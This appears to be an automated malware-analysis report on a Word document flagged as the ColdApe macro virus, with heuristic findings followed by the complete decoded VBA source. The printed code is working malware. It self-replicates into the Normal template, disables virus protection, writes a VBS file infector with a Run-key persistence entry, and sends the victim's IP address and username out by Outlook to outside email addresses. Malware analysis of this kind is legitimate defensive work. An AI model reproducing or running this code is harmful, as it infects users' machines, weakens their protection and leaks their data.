Verdict: MALICIOUS
Risk Score: 536
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1547.001 Registry Run Keys / Startup Folder
T1071.001 Web Protocols
T1566.001 Spearphishing Attachment
The sample contains VBA macros that exhibit self-replication behavior, attempting to copy themselves to the Normal template and the active document. It also includes logic to harvest recipients from the MAPI address book and send itself programmatically, indicative of an email worm. The script also attempts to tamper with virus protection settings and writes values to the registry, suggesting an attempt to establish persistence or evade detection. The ClamAV detection name 'Win.Trojan.ColdApe-1' strongly suggests this family.
Heuristics 12
- ClamAV: Win.Trojan.ColdApe-1 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Win.Trojan.ColdApe-1
- VBA macros detected (medium, OLE_VBA_MACROS, 8 related findings): Document contains VBA macro code
- Potential Shell call in VBA (critical, OLE_VBA_SHELL): Potential Shell call in VBA. Matched line in script:
  `Shell "wscript c:\happy.vbs", vbHide`
- WScript.Shell usage (critical, OLE_VBA_WSCRIPT): WScript.Shell usage. Matched line in script:
  `Print #1, "Set WSHShell = Wscript.CreateObject(""Wscript.Shell"")"`
- VBA macro-virus self-replication / AV tampering (critical, OLE_VBA_MACRO_VIRUS_REPLICATION): VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature. Matched line in script:
  `NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.AddFromString ("Sub AutoClose()" & vbCr & ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.Lines(2, ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.CountOfLines - 1))`
- VBA email-worm self-replication (Outlook mass-mailer) (critical, OLE_VBA_EMAIL_WORM_SELF_REPLICATION): VBA macro drives Outlook to mass-mail itself: it automates Outlook.Application, programmatically creates a mail item, and spreads by harvesting recipients from the MAPI address book / inbox and sending the message programmatically. Harvesting recipients from the address book / inbox and auto-attaching the carrier to outgoing messages is the defining behavior of the Melissa / LoveLetter / W97M mass-mailer worm lineage — there is no benign document use, independent of any AV signature. Matched line in script:
  `Print #1, "Set theMailItem = theApp.CreateItem(0)"`
- CreateObject call (high, OLE_VBA_CREATEOBJ): CreateObject call. Matched line in script:
  `Print #1, "Set WSHShell = Wscript.CreateObject(""Wscript.Shell"")"`
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- AutoOpen macro (low, OLE_VBA_AUTOOPEN): AutoOpen macro. Matched line in script:
  `ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.AddFromString ("Sub AutoOpen()" & vbCr & NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.Lines(2, NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.CountOfLines - 1))`
- Auto_Close macro (low, OLE_VBA_AUTOCLOSE): Auto_Close macro. Matched line in script:
  `Sub AutoClose()`
- Reference to Windows Script Host (high, SC_STR_WSCRIPT): Reference to Windows Script Host
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 22677 bytes |

SHA-256: e27d9de1e0fedc23253779697c144c28670db29ea51f926b952dd0fc262f719c
Detection: ClamAV: Doc.Trojan.ColdApe-2
Obfuscation or payload: unlikely

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Sub AutoClose()
'AVM
On Error Resume Next
Dim DC, IT As Integer
Application.EnableCancelKey = y
Options.VirusProtection = y
Options.SaveNormalPrompt = y
Options.ConfirmConversions = y
a = ActiveDocument.Saved
If Right(NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.Lines(2, 1), 3) <> "AVM" Then
NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.AddFromString ("Sub AutoClose()" & vbCr & ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.Lines(2, ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.CountOfLines - 1))
End If
If Right(ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.Lines(2, 1), 3) <> "AVM" Then
ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.AddFromString ("Sub AutoOpen()" & vbCr & NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.Lines(2, NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.CountOfLines - 1))
If Left(ActiveDocument.Name, 8) <> "Document" Then ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
End If
IT = (Day(Now))
DC = System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\VB and VBA Program Settings\Office\8.0", "AVM-DC")
If DC = "" Or DC < IT Then
GoOk = True
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\VB and VBA Program Settings\Office\8.0", "AVM-DC") = IT
End If
TestCon = System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\VB and VBA Program Settings\Office\8.0", "AVM-VBS")
If System.PrivateProfileString("", "HKEY_CLASSES_ROOT\VBSFile\ScriptEngine", "") = "VBScript" Then SIY = True
If SIY = True And TestCon <> "Done" Then
Open "c:\happy.vbs" For Output As 1
Print #1, "'§"
Print #1, ""
Print #1, "On Error Resume Next"
Print #1, "Dim IV6, U187, IV7, IV1, IV2, IV3, IV4"
Print #1, "Dim T111"
Print #1, "Dim IV5(200)"
Print #1, "Dim XR"
Print #1, "Set WSHShell = Wscript.CreateObject(""Wscript.Shell"")"
Print #1, "Set WshSysEnv = WSHShell.Environment(""Process"")"
Print #1, "IV10 = WshSysEnv(""Path"")"
Print #1, "IV7 = WSHShell.ExpandEnvironmentStrings(""%windir%\avm.vbs"")"
Print #1, "IV1 = Wscript.ScriptFullName"
Print #1, "Set IV6 = CreateObject(""Scripting.FileSystemObject"")"
Print #1, "XR = 1"
Print #1, "T11 = Wscript.ScriptFullName"
Print #1, "For x = Len(IV10) To 1 Step -1"
Print #1, "IV4 = Mid(IV10, x, 1)"
Print #1, "If IV4 <> "";"" Then"
Print #1, "IV5(XR) = IV4 + IV5(XR)"
Print #1, "ElseIf IV4 = "";"" Then"
Print #1, "IV5(XR) = IV5(XR) + ""\"""
Print #1, "XR = XR + 1"
Print #1, "End If"
Print #1, "Next"
Print #1, "IV5(XR) = IV5(XR) + ""\"""
Print #1, "IV5(XR + 1) = WSHShell.SpecialFolders(""Desktop"") + ""\"""
Print #1, "IV5(XR + 2) = WSHShell.SpecialFolders(""MyDocuments"") + ""\"""
Print #1, "IV5(XR + 3) = WSHShell.SpecialFolders(""Startup"") + ""\"""
Print #1, "IV5(XR + 4) = Left(T11, InStrRev(T11, ""\""))"
Print #1, "Set TS = IV6.OpenTextFile(T11, 1)"
Print #1, "IV9 = TS.ReadAll"
Print #1, "TS.Close"
Print #1, "IV8 = Chr(167)"
Print #1, "endIV8 = ""'"" & IV8"
Print #1, "For x = Len(IV9) To 1 Step -1"
Print #1, "If Mid(IV9, x, 1) = IV8 Then"
Print #1, "x = 1"
Print #1, "IV3 = endIV8 + IV3"
Print #1, "ElseIf Mid(IV9, x, 1) <> IV8 Then"
Print #1, "IV3 = Mid(IV9, x, 1) + IV3"
Print #1, "End If"
Print #1, "Next"
Print #1, "For y = 1 To (XR + 4)"
Print #1, "For Each Target In IV6.GetFolder(IV5(y)).Files"
Print #1, "If UCase(Right(Target.Name, 3)) = ""VBS"" Then"
Print #1, "IV11 = """""
Print #1, "Set TS = IV6.OpenTextFile(IV5(y) & Target.Name, 1)"
Print #1, "IV11 = TS.ReadAll"
Print #1, "TS.Close"
Print #1, "If mid(IV11,(len(IV11)-2),1) <> ""¥"" Then"
Print #1, "Set TS = IV6.OpenTextFile(IV5(y) & Target.Name, 8)"
Print #1, "TS.Write IV3"
Print #1, "TS.Close"
Print #1, "End If"
Print #1, "End If"
Print #1, "Next"
Print #1, "Next"
Print #1, "FIV11 (IV7)"
Print #1, "If T111 = False Then"
Print #1, "WSHShell.RegWrite ""HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\AVM"", IV7"
Print #1, "Set U187 = IV6.OpenTextFile(IV7, 2, True)"
Print #1, "U187.Write IV3"
Print #1, "U187.Close"
Print #1, "End If"
Print #1, "Function FIV11(filespec)"
Print #1, "Set IV6 = CreateObject(""Scripting.FileSystemObject"")"
Print #1, "If (IV6.FileExists(filespec)) Then"
Print #1, "T111 = True"
Print #1, "Else"
Print #1, "T111 = False"
Print #1, "End If"
Print #1, "End Function"
Print #1, "' Nick ""The Love Monkey"" Virus Package by ALT-F4 and ALT-F11 for the Alternative Virus Mafia"
Print #1, "'¥"
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\VB and VBA Program Settings\Office\8.0", "AVM-VBS") = "Done"
Close 1
Shell "wscript c:\happy.vbs", vbHide
End If
If SIY = True And GoOk = True Then
If Dir("c:\A4.vbs") = "" Then
Open "c:\A4.vbs" For Output As 1
Print #1, "Dim theApp, theNameSpace, theMailItem"
Print #1, "Dim IPSocket"
Print #1, "On Error Resume Next"
Print #1, "Set IPSocket = CreateObject(""MSWinsock.Winsock"")"
Print #1, "IPADDY = IPSocket.LocalIP"
Print #1, "set BOB = CreateObject(""Wscript.Network"")"
Print #1, "For x = 1 To 2"
Print #1, "If x = 1 Then EMADDY = ""avm@nym.alias.net"" Else EMADDY = ""nick@virusbtn.com"""
Print #1, "if x = 1 then MSGBDY = IPADDY else MSGBDY = ""Dear Nicky... my name is " & Application.UserName & " and I want to make hot monkey love with you. You anti-virus stud!"""
Print #1, "Set theApp = WScript.CreateObject(""Outlook.Application"")"
Print #1, "Set theNameSpace = theApp.GetNameSpace(""MAPI"")"
Print #1, "theNameSpace.Logon ""profile"", ""password"""
Print #1, "Set theMailItem = theApp.CreateItem(0)"
Print #1, "theMailItem.Recipients.Add EMADDY"
Print #1, "theMailItem.Subject = BOB.Username"
Print #1, "theMailItem.Body = MSGBDY"
Print #1, "theMailItem.Send"
Print #1, "theNameSpace.Logoff"
Print #1, "Next"
Close 1
End If
Shell "wscript c:\a4.vbs", vbHide
End If
If ActiveDocument.Saved <> a Then ActiveDocument.Saved = a
' Nick "The Love Monkey" Virus Package by ALT-F4 and ALT-F11 for the Alternative Virus Mafia
End Sub